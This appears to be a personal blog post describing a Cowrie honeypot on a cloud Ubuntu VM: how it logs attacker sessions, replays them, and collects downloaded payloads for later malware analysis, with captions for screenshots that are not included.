Cowrie is a powerful platform for establishing a honeypot. The honeypot can be used to attract attackers and bots and record all of their movement within the virtual environment as they traverse the honeypot. Most notably, they honeypot will capture and download any payloads that are ran in the environment. This creates the opportunity for malware analysis of the payloads in a secure environment.
Cowrie can be installed by following. https://cowrie.readthedocs.io/en/latest/INSTALL.html
My cowrie honeypot runs openly on the internet via a virtual machine in the cloud. This approach will eliminate the need to expose my personal network to attackers and safely monitor and study the tactics of threat actors. The VM runs with the following specifications:
- OS - Ubuntu x64
- vCPU/s: 1 vCPU
- Storage: 25 GB NVMe
Cowrie running on my cloud VM (bin/cowrie status)
Honeypot activity is logged into daily folders which are used to review the activities as they happen on the honeypot. These logs can be useful for correlating events based on time when forwarded to a SIEM tool.
Log captures of attacker activity(logs at: /cowrie/var/log/cowrie)
Cowrie will record each ssh/telnet session that is opened by attackers. These sessions can be played back to perform a live analysis of the exact actions performed by the threat actor and can reveal useful information such as commands ran by the attacker and any IP addresses used to download malware onto the honeypot server
Recorded sessions availiable for playback on my honeypot (/cowrie/var/lib/cowrie/tty):
Playback - threat actor commands captured and displayed for playback using playlog command
Our downloads folder contain any files that are downloaded to the honeypot server. These downloads can be further analyzed using a text editor or decompiled and quarantined into a malware analysis lab to study the behavior of the malware when detonated.
Cowrie downloads folder displaying all the downloaded files from threat actors:
View payload downloaded to server by threat actor:
